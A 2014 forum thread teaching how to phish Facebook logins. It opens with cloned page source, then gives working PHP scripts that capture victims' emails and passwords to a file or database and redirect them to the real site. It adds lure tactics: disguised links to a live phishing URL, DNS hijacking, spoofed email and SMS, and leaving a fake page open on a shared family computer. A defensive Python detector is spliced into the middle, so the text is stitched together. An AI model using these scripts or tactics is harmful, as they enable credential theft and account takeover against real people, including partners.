/rsrc.php\/v2\/ye\/r\/0ZwTbi-CG_R.js"},"BqQay":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yS\/r\/QDArHBj7y0a.js"},"fE\/se":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yg\/r\/xhEsvAr6JY-.js"},"BANJS":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yg\/r\/mpXNiKjpZ83.js"},"M2Jox":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yo\/r\/tjX70OjzQgL.js"},"q+j1N":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yy\/r\/jO2xJzk0
GEQ.js"},"20549":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yB\/r\/QHrOsIWcffr.js"},"cAkXN":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yR\/r\/IQc0ALCNDHy.js"},"oE4Do":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yK\/r\/obqKRvJtthA.js"},"QV2wP":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/y9\/r\/5hBuQE3pPO3.js"},"xiSec":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yw\/r\/gqJSLDzQiIt.js"},"ccpBO":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/y9\/r\/hWgsbVnFDQl.js"},"cNca2":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/y4\/r\/yuKCSDDP1tN.js"},"7O5+\/":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yT\/r\/Qzc057vSWGh.js"},"oxkbG":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yI\/r\/dxzlY_JXlO2.js"},"ge0OI":{"type":"css","permanent":1,"crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/y8\/r\/Kku0adwjStu.css"},"VhRBk":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yN\/r\/pc9in0IPnJ1.js"},"VDymv":{"type":"css","permanent":1,"crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yW\/r\/V00-AnCtiR3.css"},"rqGCm":{"type":"css","permanent":1,"crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yt\/r\/1OIHuKx_W5Z.css"},"QMjhY":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yE\/r\/lRELHs__Isc.js"},"3hBYd":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yv\/r\/84QIRKzCnzp.js"},"wxq+C":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/ys\/r\/6QvdZ6KuzBm.js"},"Rs18G":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akama
ihd.net\/rsrc.php\/v2\/yI\/r\/iqqxHqHkZcL.js"},"6AU0l":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yX\/r\/uAtB4Wsl2Sl.js"},"AtxWD":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yG\/r\/J74KdXozsKP.js"},"zyFOp":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yT\/r\/Ri9nQJbah9T.js"}});if (true) {Bootloader.enableBootload({"React":{"resources":["YICz5","JtyCr"],"module":true},"ExceptionDialog":{"resources":["JtyCr","BqQay","YICz5","r+ckK","F5aqA","fE\/se","BANJS","M2Jox","q+j1N","20549"],"module":true},"AsyncDOM":{"resources":["JtyCr","cAkXN"],"module":true},"ConfirmationDialog":{"resources":["JtyCr","r+ckK","oE4Do"],"module":true},"Dialog":{"resources":["JtyCr","YICz5","r+ckK","F5aqA","QV2wP"],"module":true},"QuickSandSolver":{"resources":["Nm4nS","JtyCr","r+ckK","BqQay","xiSec","ccpBO"],"module":true},"ErrorSignal":{"resources":["JtyCr","cNca2"],"module":true},"Event":{"resources":["JtyCr"],"module":true},"AsyncDialog":{"resources":["JtyCr","BqQay","YICz5","r+ckK","F5aqA"],"module":true},"AsyncRequest":{"resources":["JtyCr"],"module":true},"DialogX":{"resources":["JtyCr","BqQay","YICz5","r+ckK","F5aqA"],"module":true},"XUIDialogTitle.react":{"resources":["YICz5","JtyCr","r+ckK","fE\/se","F5aqA","BANJS"],"module":true},"XUIDialogBody.react":{"resources":["YICz5","JtyCr","F5aqA","fE\/se"],"module":true},"XUIDialogButton.react":{"resources":["YICz5","JtyCr","fE\/se","r+ckK","F5aqA"],"module":true},"XUIDialogFooter.react":{"resources":["YICz5","JtyCr","r+ckK","fE\/se","F5aqA"],"module":true},"XUIGrayText.react":{"resources":["YICz5","JtyCr","F5aqA","fE\/se","q+j1N"],"module":true},"PhotoSnowlift":{"resources":["7O5+\/","JtyCr","YICz5","r+ckK","F5aqA","QV2wP","oxkbG","BqQay","fE\/se"],"module":true},"PhotoTagger":{"resources":["JtyCr","M2Jox","r+ckK","YICz5","F5aqA","QV2wP","oxkbG","BqQay","fE\/se","BANJS"],"module":true},"Live":{"resources":["JtyCr","cAkXN"
],"module":true},"PhotoTagApproval":{"resources":["JtyCr","oxkbG","M2Jox"],"module":true},"PhotoTags":{"resources":["JtyCr","oxkbG","r+ckK","M2Jox"],"module":true},"TagTokenizer":{"resources":["JtyCr","fE\/se","F5aqA","ge0OI","VhRBk","M2Jox","r+ckK","fmS14"],"module":true},"css:fb-photos-snowlift-fullscreen-css":{"resources":["VDymv"]},"SnowliftPicCropper":{"resources":["JtyCr","YICz5","r+ckK","F5aqA","QV2wP","M2Jox","oxkbG","rqGCm","QMjhY","3hBYd","wxq+C"],"module":true},"PhotosButtonTooltips":{"resources":["JtyCr","r+ckK","YICz5","F5aqA","Rs18G"],"module":true},"VideoRotate":{"resources":["JtyCr","YICz5","r+ckK","F5aqA","QV2wP","6AU0l"],"module":true},"AsyncResponse":{"resources":["JtyCr"],"module":true},"PhotoPermalinkCropper":{"resources":["JtyCr","YICz5","r+ckK","F5aqA","QV2wP","M2Jox","oxkbG","rqGCm","7O5+\/","BqQay","fE\/se","BANJS","QMjhY","3hBYd"],"module":true},"PhotoInlineEditor":{"resources":["JtyCr","7O5+\/","YICz5","r+ckK","oxkbG","BqQay","M2Jox","F5aqA","QV2wP","fE\/se","BANJS","VhRBk","ge0OI","fmS14","AtxWD"],"module":true},"Form":{"resources":["JtyCr","r+ckK"],"module":true},"SpotlightShareViewer":{"resources":["JtyCr","BqQay","zyFOp"],"module":true},"Toggler":{"resources":["JtyCr","r+ckK","YICz5","F5aqA"],"module":true},"Tooltip":{"resources":["JtyCr","r+ckK","YICz5","F5aqA"],"module":true},"DOM":{"resources":["JtyCr"],"module":true},"Input":{"resources":["JtyCr","r+ckK"],"module":true},"trackReferrer":{"resources":[],"module":true},"DimensionTracking":{"resources":["JtyCr","BqQay"],"module":true},"HighContrastMode":{"resources":["JtyCr","BqQay"],"module":true},"DetectBrokenProxyCache":{"resources":["JtyCr","BqQay"],"module":true}});}});</script>
<script>requireLazy(["InitialJSLoader"], function(InitialJSLoader) {InitialJSLoader.loadOnDOMContentReady(["JtyCr","Nm4nS","fmS14","AhP9C","FlMQw","4vv8\/"]);});</script>
<script>
requireLazy(["Bootloader"], function(Bootloader) {Bootloader.configurePage(["r+ckK","bKKW+","F5aqA","nHPXb"]);});

(require("ServerJSDefine")).handleDefines([["TimeSpentConfig",[],{"0_delay":0,"0_timeout":8,"delay":200000,"timeout":64},142],["ImmediateActiveSecondsConfig",[],{"sampling_rate":0},423]]);require("InitialJSLoader").handleServerJS({"elements":[["m_0_1","login_form",2],["m_0_0","u_0_0",2],["m_0_2","loginbutton",2],["m_0_3","login_form",2]],"require":[["TimezoneAutoset","setInputValue",["m_0_0"],[{"__m":"m_0_0"},1414406746]],["LoginFormController","init",["m_0_1","m_0_2"],[{"__m":"m_0_1"},{"__m":"m_0_2"}]],["PostLoadJS","loadAndCall",[],["QuickSandSolver","solveAndUpdateForm",[1,"?|7??.U\u001d??\u04bcQ&\u04ebe????\u045bs???\u0005?NRr",10,42,100,"login_form","AZkDa7MgK5ihifkrxTRClF1Q_4Ow6EHPPzyOxgfYMA551B4OPIeKu0Ha9PyP3-26cOX5_NSe49abP6fK0HjcMuhBh_UO0eRZZyEyeZv4bXTl-iKF4_OjHP_5y3ebitc0krlDSVme5AjxeFQLvHZt06uVLZPhR3TeaRhNxHYb69R-_iptM9Gpc1Hhvbj4PDdgBkmZH86Nqw6rBufrgX0mLB253H-fofVZTzQ56twXFP9K2g"]]],["PixelRatio","startDetecting",[],[1]],["Intl","setPhonologicalRules",[],[{"meta":{"\/_B\/":"([.,!?\\s]|^)","\/_E\/":"([.,!?\\s]|$)"},"patterns":{"\/\u0001(.*)('|&#039;)s\u0001(?:'|&#039;)s(.*)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u0001\/e":"mb_strtolower(\"\u0001$1\u0001\")","\/\\^\\x01([^\\x01])(?=[^\\x01]*\\x01)\/e":"mb_strtoupper(\"\u0001$1\")","\/_\u0001([^\u0001]*)\u0001\/":"javascript"}}]],["PostLoadJS","loadAndRequire",[],["DimensionTracking"]],["PostLoadJS","loadAndCall",[],["HighContrastMode","init",[{"isHCM":false,"spacerImage":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/y4\/r\/-PAXP-deijE.gif"}]]],["PostLoadJS","loadAndCall",[],["DetectBrokenProxyCache","run",[0,"c_user"]]],["Artillery"],["ScriptPath","set",[],["\/login.php","ad976420","97164693"]],["ClickRefLogger"],["userAction","setUATypeConfig",[],[{"ua:e":false}]],["ScriptPathState","setUserURISampleRate",[],[0.0002]],["userAction","setCustomSampleConfig",[],[{"ua:n":{"test":{"ua_id":{"test":true}}},"ua:i":{"snowlift":{"action":{"open":true,"close":true}},"snowflake":{"action":{"open":true,"cl
ose":true}},"canvas":{"action":{"mouseover":true,"mouseout":true}}}}]],["UserActionHistory"],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["TinyViewport"],["WebStorageMonster","schedule",[],[false]],["ModuleErrorLogger","init",[],[]]]});

</script>
<!-- BigPipe construction and first response -->
<script>var bigPipe = new (require("BigPipe"))({"lid":0,"forceFinish":true});</script>
<script>bigPipe.onPageletArrive({"id":"first_response","phase":0,"jsmods":{},"is_last":true,"css":["r+ckK","bKKW+","F5aqA","nHPXb"],"js":["JtyCr","Nm4nS","fmS14","AhP9C","FlMQw","4vv8\/"]})</script><script>bigPipe.onPageletArrive({"id":"","phase":1,"jsmods":{},"is_last":true,"css":["r+ckK","bKKW+","F5aqA","nHPXb"],"js":["JtyCr","Nm4nS","fmS14","AhP9C","FlMQw","4vv8\/"],"the_end":true})</script></body></html>

That's a lot of data to sift through, so I recommend you hit Ctrl+F and search for the following: action=
The form's action attribute should look similar to action="/login.php?login_attempt=1". This attribute tells the browser where to send the form data when the user submits it, so that is the value we want to modify.
For now, go ahead and change it to the following: action="/login_failed.php". It is a relative path, so the browser will POST to that file on whatever host serves the fake page. Leave method="post" as it is; the logging script below reads the submitted fields from $_POST.

4. [Logging credentials]
- Now that we have a page that looks identical to the target site's login page, and have changed the form's action to point at a file on our own server, let's create that file and have it log the credentials.
Let me start by saying that there are many ways to log someone's credentials; I may mention some without going into detail, but I advise you to look into all of the options. Create a file named login_failed.php in the same directory as the fake login page, and use any of the following logging methods:

Text file approach - Saving the credentials to a local text file (make sure the web server's user has permission to write to the file)
Code:
<?php
// Replace credentials.txt with the filename (and location) of your choice.
// Keep it outside the web root: a log that sits next to the fake page, like
// the .credentials.txt in the demo below, can be read by anyone who guesses its name.
$log_file = 'credentials.txt';

// The $_POST keys must match the name= attributes of the cloned form
// (Facebook's login form uses "email" and "pass").
$email = isset($_POST['email']) ? $_POST['email'] : '';
$pass  = isset($_POST['pass'])  ? $_POST['pass']  : '';
$content = $email . ':' . $pass . "\r\n";

// Append under an exclusive lock so concurrent submissions do not interleave.
file_put_contents($log_file, $content, FILE_APPEND | LOCK_EX);

// Replace the site below with the target site, then stop the script so
// nothing is sent after the redirect header.
header('Location: https://www.facebook.com/login.php?login_attempt=1');
exit;
?>


The database approach - Take the username and password and store them in a database on the server (the code below assumes you have already created the database and an accounts table with user and pass columns)
Code:
<?php
$server   = 'localhost';
$username = 'root';
$password = 'pass';
$db_name  = 'phishing';

$con = new mysqli($server, $username, $password, $db_name);
if ($con->connect_error) {
    // Nothing can be logged; still send the victim on so nothing looks broken.
    header('Location: https://www.facebook.com/login.php?login_attempt=1');
    exit;
}

$email = isset($_POST['email']) ? $_POST['email'] : '';
$pass  = isset($_POST['pass'])  ? $_POST['pass']  : '';

// Use a prepared statement. Interpolating $_POST['email'] into the query
// string is a parse error inside double quotes and, once "fixed", would let a
// victim inject SQL into your own database by typing a quote into the form.
$stmt = $con->prepare('INSERT INTO accounts (user, pass) VALUES (?, ?)');
$stmt->bind_param('ss', $email, $pass);
$stmt->execute();
$stmt->close();
$con->close();

header('Location: https://www.facebook.com/login.php?login_attempt=1');
exit;
?>


The e-mail approach - If your server is set up so that PHP can send mail, you can e-mail the captured information to yourself instead of writing it to disk.

The text approach - Using some SMS gateway APIs, it's possible to send the information to your phone as a text message.


5. [Redirecting]
- In the code above, you will notice this line of PHP code several times:
Code:
header('Location: https://www.facebook.com/login.php?login_attempt=1');
This sends the victim to the real login page, so the failed attempt looks like a mistyped password and their second try succeeds on the genuine site. Two things to keep in mind: header() only works if the script has not output anything yet (no whitespace or HTML before the <?php tag), and the script should exit immediately after it so nothing else runs.

D. [Social Engineering & Tactics]
1. [Homepage / Bookmarks]
- I know you know those people. Their online life involves hopping straight onto Facebook, as fast as possible. They usually have Facebook set as their homepage or bookmarked. Go ahead and change that homepage or bookmark to your fake login page. Most of the time people will just open the browser or click the link without thinking about it. Habit is the weakness here: once someone is used to a routine, they stop checking the small things, such as the URL. (Read about the seven sins of memory for additional brownie points.)

2. [Sending a link]
- This one requires a bit more skill, as it is more noticeable than the others. The goal is to get the victim to click the link you give them without making them suspicious. In my opinion this is easiest somewhere you can write raw HTML, because the visible text of a link and its actual destination are independent. You could write a tutorial about something on Facebook and have the first link appear to go to the login page when it really doesn't, like so:
Code:
<a href="http://infosploit.com/test/phish.php">https://www.facebook.com/</a>
A live example would look like this: https://www.facebook.com/
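The two things the post changes in the clone, the form's action (section C.3 above) and a link whose visible text is the real URL while its href is not (D.2, just above), are exactly what a defender checks for when triaging a suspected phishing page. The script below is an added example, not code from the original post: it parses a page's forms and anchors with Python's standard library and flags any form that posts to a host outside the brand's domain and any link whose visible URL names a different host than its href. The HTML it runs on is constructed here to mirror the post's clone; `find_suspicious`, `on_brand` and the `brand` parameter (a registrable domain such as `facebook.com`, matched by exact host or subdomain, with no public-suffix handling) are assumptions of this example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormsAndLinks(HTMLParser):
    """Collect every <form action=...> and every (<a href>, visible text) pair."""

    def __init__(self):
        super().__init__()
        self.forms = []        # action attribute of each form ("" if none)
        self.links = []        # (href, visible text) for each anchor
        self._href = None      # href of the anchor currently open, if any
        self._text = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.forms.append(attrs.get("action") or "")
        elif tag == "a":
            self._href = attrs.get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Lower-cased hostname of a URL, or "" if it has none."""
    return (urlsplit(url).hostname or "").lower()


def on_brand(host, brand):
    """True if host is the brand's registrable domain or a subdomain of it.
    Exact-suffix match only: no public-suffix list (assumption of this example)."""
    return host == brand or host.endswith("." + brand)


def find_suspicious(html, page_url, brand):
    """Return human-readable findings for a page fetched from page_url that
    presents itself as `brand` (e.g. "facebook.com")."""
    parser = _FormsAndLinks()
    parser.feed(html)
    findings = []

    # C.3: a relative action such as "/login_failed.php" resolves against the
    # page's own URL, so a clone hosted elsewhere posts credentials off-brand.
    for action in parser.forms:
        target = host_of(urljoin(page_url, action))
        if not on_brand(target, brand):
            findings.append(
                f"form posts to {target!r} (action={action!r}), outside {brand!r}")

    # D.2: visible text that is itself a URL but names a different host than
    # the href the browser will actually follow.
    for href, text in parser.links:
        if text.startswith(("http://", "https://")):
            shown, real = host_of(text), host_of(urljoin(page_url, href))
            if shown != real:
                findings.append(
                    f"link text shows {shown!r} but href goes to {real!r}")
    return findings


# Constructed sample modelled on the post's clone: the form action was changed
# to a file on the attacker's host and the tutorial link hides its real target.
CLONE_HTML = """
<html><body>
<form id="login_form" action="/login_failed.php" method="post">
  <input type="text" name="email"><input type="password" name="pass">
  <input type="submit" id="loginbutton" value="Log In">
</form>
<p>See <a href="http://infosploit.com/test/phish.php">https://www.facebook.com/</a>
and <a href="https://www.facebook.com/help/">Help</a>.</p>
</body></html>
"""

if __name__ == "__main__":
    for finding in find_suspicious(
            CLONE_HTML, "http://infosploit.com/test/phish.php", "facebook.com"):
        print("SUSPICIOUS:", finding)
```

Run it on a fetched page with `find_suspicious(html, page_url, "facebook.com")`: the first argument is the raw HTML, the second the URL it was fetched from, which is needed to resolve a relative action like /login_failed.php to a host. A clean copy of the real login page, whose form posts back to www.facebook.com, produces no findings; the constructed clone produces two, one for the form and one for the disguised link.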

3. [URL Redirects]
- If you control the victim's DNS resolver (for example with dnsmasq on a network you run), you can answer lookups for the target site with your own server's address, so users land on your page whenever they try to visit the real site. The downside is that the victim then cannot reach the real site at all, which quickly draws attention and raises flags (you would also need to change the redirects in your scripts, since the target's hostname now resolves to you), and for an HTTPS site the browser will show a certificate error because you hold no certificate for the target's name. I recommend only doing this for things like e-mail and banks, where you want to be ready to log in quickly, get what you need, and then disable the redirect as fast as possible.

4. [Wait Bait]
- So, if you have a 'house computer', one shared between family members (like your damned cheating wife) or friends, I recommend this approach.
Load your fake page, then click in the address bar and replace its URL with the real site's URL, without pressing Enter. For example, my fake Facebook login is located at infosploit.com/test/phish.php: I would navigate there, replace the URL with https://www.facebook.com/, walk away from the computer, and wait for them to log in. At that point they get redirected, thinking they entered the wrong credentials, unaware of the attack. A word of advice with this approach: have SSL enabled on your site (as you can tell, I don't), otherwise the green lock some people are always looking for will be missing.

5. [Spoofing E-mail]
- If you can spoof an e-mail to your victim from an address that looks legitimate, on the target site's behalf, you may be able to trick them into following the link and logging in (for some specific purpose, like checking messages). Here you just need to be creative and think of a plausible reason for the user to log in. You do not want to send things like "We noticed recent activity in your security questions, log in <insert link here> to view the changes." The reason I recommend against this is that it draws awareness, and they may change their password after logging in to the real site. Keep in mind that a target domain publishing SPF, DKIM and DMARC records makes a spoofed From: address much more likely to be rejected or sent to junk.

6. [Spoofing Numbers]
- This is the same idea as D.5, except the message arrives as a text from a spoofed phone number.

7. [Portability]
- This involves sending the link to people on mobile devices. If you have a server set up, you can create subdomains. I noticed that on portable devices, especially phones, the URL shown to the user is cut off and short. I recommend you take advantage of this by getting a subdomain relevant to the target site. So, if I wanted to target Facebook and I owned infosploit.com, I could create a subdomain like facebook.infosploit.com or similar. Much of the time the URL is truncated, so it might only show up in their address bar as "https://facebook.info" or similar, which makes the URL seem more plausible to mobile users.

To give it a dummy whirl, open http://infosploit.com/test/phish.php and then change the URL to https://www.facebook.com/
It seems pretty legit if you just walked into a room with that computer on (minus the SSL).
Feel free to post some dummy information and then check back at http://infosploit.com/test/.credentials.txt for the information.
Last edited by -Ninjex- on Mon Oct 27, 2014 2:46 pm, edited 4 times in total.
For those that know
K: 0x2CD8D4F9


Re: The Art of Phishing

Post by Freedom Jack on Mon Oct 27, 2014 9:35 am
([msg=84608]see Re: The Art of Phishing[/msg])

niceee


Re: The Art of Phishing

Post by tremor77 on Mon Oct 27, 2014 9:24 pm
([msg=84629]see Re: The Art of Phishing[/msg])

Thorough post and well laid out, I commend thee for all that typing.


Re: The Art of Phishing

Post by cyberdrain on Tue Oct 28, 2014 2:51 pm
([msg=84641]see Re: The Art of Phishing[/msg])

Nice read Ninjex, next up: Social Engineering Toolkit (or so I hope).
Free your mind / Think clearly


Re: The Art of Phishing

Post by centip3de on Tue Oct 28, 2014 3:02 pm
([msg=84642]see Re: The Art of Phishing[/msg])

+1 for Ninjex.
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -Rick Cook


Re: The Art of Phishing

Post by Mr-Mouse on Tue Oct 28, 2014 10:16 pm
([msg=84651]see Re: The Art of Phishing[/msg])

Remind me to never click on a link you send me :D ahaha gj :)
Ah, when to the heart of man
Was it ever less than a treason
To go with the drift of things,
To yield with a grace to reason,
And bow and accept the end
Of a love or a season?

-Robert Frost


Re: The Art of Phishing

Post by -Ninjex- on Thu Oct 30, 2014 8:16 am
([msg=84678]see Re: The Art of Phishing[/msg])

Thanks, guys, for reading. I suppose I could have gone more in depth and discussed more about social engineering, and even talked about spear phishing, but this was already quite lengthy.

So, the live demonstration isn't going to be available anymore. I've had multiple complaints from Google, regarding the status of my site. I received this message today:

Code:
We have recently discovered that some pages on your site look like a possible phishing attack, in which users are encouraged to give up sensitive information such as login credentials or banking information. We have removed the suspicious URLs from Google.com search results and have begun showing a warning page to users who visit these URLs in certain browsers that receive anti-phishing data from Google.


Re: The Art of Phishing

Post by -Unicod3- on Thu Nov 06, 2014 6:50 am
([msg=84832]see Re: The Art of Phishing[/msg])

Very nice post! Too bad about Google being onto you :P
"Little by little, one travels far" - J.R.R. Tolkien


Re: The Art of Phishing

Post by parakkafaith on Thu Nov 06, 2014 8:17 am
([msg=84837]see Re: The Art of Phishing[/msg])

That wait bait is my favourite. The thought of leaving a page open after changing the URL never crossed my mind.

I'd like to see more Ninjex SE wizardry.
"Any technology distinguishable from magic is insufficiently advanced."
- Probably not Arthur C. Clarke


